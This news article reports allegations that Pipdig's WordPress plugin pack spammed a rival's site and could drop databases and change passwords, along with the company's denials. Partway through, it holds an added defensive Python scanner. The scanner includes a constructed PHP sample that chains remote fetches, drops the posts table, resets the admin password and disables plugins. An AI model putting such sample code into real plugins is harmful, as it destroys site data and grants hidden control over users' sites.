The curious case of a WordPress plugin, a rival site spammed with traffic, a war of words, and legal threats
Devs strip code from toolkit amid dramarama
Updated A British web-dev outfit has denied allegations it deliberately hid code inside its WordPress plugins that, among other things, spammed a rival's website with junk traffic.
Pipdig, which specializes in designing themes and templates for sites running the popular WordPress publishing system, was accused late last week of including code within its plugins that fired duff requests to the dot-com of a competing maker of themes. It was also accused of slipping in code that allowed it to remotely wipe its users' databases, modify URLs in links, change site admin passwords, and disable other third-party plugins.
These plugins are installed server-side by webmasters to enhance their WordPress installations, and they include backend and frontend code executed as visitors land on pages. Pipdig has denied any wrongdoing.
The accusations were made by Jem Turner, a web developer who questioned the purpose of several subroutines within the Pipdig Power Pack (P3), a set of plugins bundled with Pipdig's themes.
"An unnamed client approached me this week complaining that her website, which was running a theme she’d purchased from a WordPress theme provider, was behaving oddly. Amongst other things, it was getting slower for no obvious reason," Turner claimed on Friday. "As speed is an important ranking factor for search engines (not to mention crucial for retaining visitors), I said I’d do some digging. What I discovered absolutely blew me away; I’ve never seen anything like it."
Turner claimed she'd found that, among other things, Pipdig's plugins fired off traffic to a stranger's website: web servers hosting the P3 PHP code would routinely send HTTP GET requests to a rival's site – kotrynabassdesign.com – flooding it with connections from all over the world, it was claimed.
The P3 tools also, it was alleged, manipulated links in customers' pages to direct visitors away from certain websites, collected data from customer sites, could change admin passwords, disabled other plugins, and implemented a remotely activated kill-switch mechanism allowing Pipdig to drop all database tables on a customer's site. Again, this is according to an analysis of the P3 source code.
At the same time, Wordfence, a security vendor specializing in services for WordPress sites, says it fielded a similar complaint about the P3 code from one of its users, and also found the same subroutines Turner described.
"The user, who wishes to remain anonymous, reached out to us with concerns that the plugin's developer can grant themselves administrative access to sites using the plugin, or even delete affected sites' database content remotely," Wordfence explained. "We have since confirmed that the plugin, Pipdig Power Pack (or P3), contains code which has been obfuscated with misleading variable names, function names, and comments in order to hide these capabilities."
Don't look at me, I didn't do it
The reports prompted a strong denial from Pipdig, which argued the claims were unfounded. In its response on Sunday, the Pipdig team denied its software deliberately lobbed web traffic at other sites. What was happening, according to Pipdig, was that the P3 code would, once an hour, fetch the contents of...
...which, strangely, contained...
...causing the P3 code to then fetch that page, which is on another server. That's how the dot-com came to be flooded with requests from systems around the world running Pipdig's code. The biz said it is trying to figure out how the external site's URL ended up in its license text file, which has since been cleared of any text to prevent any unnecessary fetching.
"We're now looking into why this function is returning this URL," Pipdig said in its response. "However it seems to suggest that some of the 'Author URLs' have been set to 'kotrynabassdesign.com'. We don't currently know why this is the case, or whether the site owner has intentionally changed this.
"The response should hit our site's wp-admin/admin-ajax.php file under normal circumstances. On the surface it could mean that some pipdig themes have been renamed to other authors. We will be looking further into this issue and provide more information as it comes up. We can confirm that it won't cause any issues for sites using pipdig themes, even if the author name/URL has been changed."
Meanwhile, the ability to drop database tables on customer sites is to reset installations to their default state, Pipdig claimed.
"The function is in place to reset a site back to defaults, however it is only activated after being in touch with the site owner," the small business explained.
As for changing URLs, Pipdig chalked that up to anti-piracy measures to ensure links to sites hosting counterfeit copies of its themes are changed over to its domain. Additionally, Pipdig said third-party plugins were disabled during the installation process to prevent any conflicts over functionality, and that it does not change admin passwords, and that the only information it collects from users' installations is the site URL, license key, WordPress version, and plugin or theme version.
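A site owner who wants to check their own installed plugins for the capability classes described above (a remote fetch whose response is fed straight into a second fetch, table drops, password changes, plugin deactivation) could start with a heuristic source scan like the following. This is an added example, not code from Pipdig, Turner or Wordfence; the PHP it scans is a constructed sample, and the vendor.example URL and function names in it are invented.

```python
"""Heuristic audit of a WordPress plugin's PHP source for the capability
classes discussed in the article. Added example; not the plugin's own code."""
import re

# Constructed sample modelled on the behaviours described above (not Pipdig's code).
SAMPLE_PLUGIN_PHP = r'''<?php
function vendor_hourly_check() {
    $r = wp_remote_get('https://vendor.example/license.txt');   // constructed URL
    $next = trim(wp_remote_retrieve_body($r));
    wp_remote_get($next);   // follows whatever URL the fetched text contains
}
function vendor_reset_site() {
    global $wpdb;
    $wpdb->query("DROP TABLE IF EXISTS {$wpdb->prefix}posts");
}
function vendor_tidy() {
    wp_set_password('changed', 1);
    deactivate_plugins('other-plugin/other-plugin.php');
}
'''

# Capability classes from the article mapped to source-level indicators.
PATTERNS = {
    "remote_fetch": r"\b(?:wp_remote_(?:get|post|request)|curl_exec|file_get_contents)\s*\(",
    "drop_table": r"\bDROP\s+TABLE\b",
    "password_change": r"\bwp_set_password\s*\(",
    "plugin_deactivation": r"\bdeactivate_plugins\s*\(",
}

def audit(php: str) -> dict[str, list[int]]:
    """Map each capability class to the line numbers where an indicator appears."""
    hits: dict[str, list[int]] = {}
    for lineno, line in enumerate(php.splitlines(), start=1):
        for name, pattern in PATTERNS.items():
            if re.search(pattern, line, re.IGNORECASE):
                hits.setdefault(name, []).append(lineno)
    return hits

def fetch_chains(php: str) -> list[str]:
    """Variables that hold a fetched response body and are then passed straight
    back into a remote fetch: the 'fetch a file, then fetch the URL inside it'
    pattern described above, with no host allowlist check in between."""
    bodies = re.findall(r"\$(\w+)\s*=\s*[^;]*wp_remote_retrieve_body\s*\(", php)
    return [v for v in bodies
            if re.search(r"wp_remote_(?:get|post|request)\s*\(\s*\$" + re.escape(v) + r"\b", php)]

if __name__ == "__main__":
    for capability, lines in audit(SAMPLE_PLUGIN_PHP).items():
        print(f"{capability}: lines {lines}")
    print("unvalidated fetch chains:", fetch_chains(SAMPLE_PLUGIN_PHP))
```

Hits are leads for manual review, not proof of malice: a legitimate uninstall routine may drop its own tables, and the point of the scan is to find the places where a reviewer must read the surrounding code.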
According to Wordfence, Pipdig has removed some of the aforementioned code from its software in a newly released version, 4.8.0, which people are urged to update to. "We reached out to the Pipdig team with questions about these issues, and within hours a new version of P3 was released with much of the suspicious code removed," Wordfence reported.
In an email to The Register on Monday, Pipdig creative director Phil Clothier acknowledged the changes, but maintained his company has done nothing wrong. "Wordfence have agreed that the latest version of the plugin is safe, however we also stand by that older versions were safe too," Clothier said. "We always recommend that people keep all plugins updated to the latest version either way."
Turner, meanwhile, stood behind her findings and conclusions on the matter. "I am aware that Pipdig have released a statement claiming that I am lying," Turner wrote in an update post. "Firstly, this statement only serves to attempt to attack my character rather than dispute any of my accusations. Secondly, it addresses only my post, and none of the accusations made by Wordfence or other developers."
Pipdig said it was seeking legal advice on the matter, though Turner told The Register she has not yet heard anything from the company.
"We will be seeking legal advice for the untrue statements and misinformation which has no doubt damaged our good name," the Pipdig team added. "Anyone who has worked with us knows how much we care about this community and every single blogger we work with. We're hugely upset, but we can hopefully re-earn any trust that has been lost due to this." ®
Updated to add
Wordfence has, to use a technical term, given Pipdig both barrels on Tuesday, examining the plugin code in depth.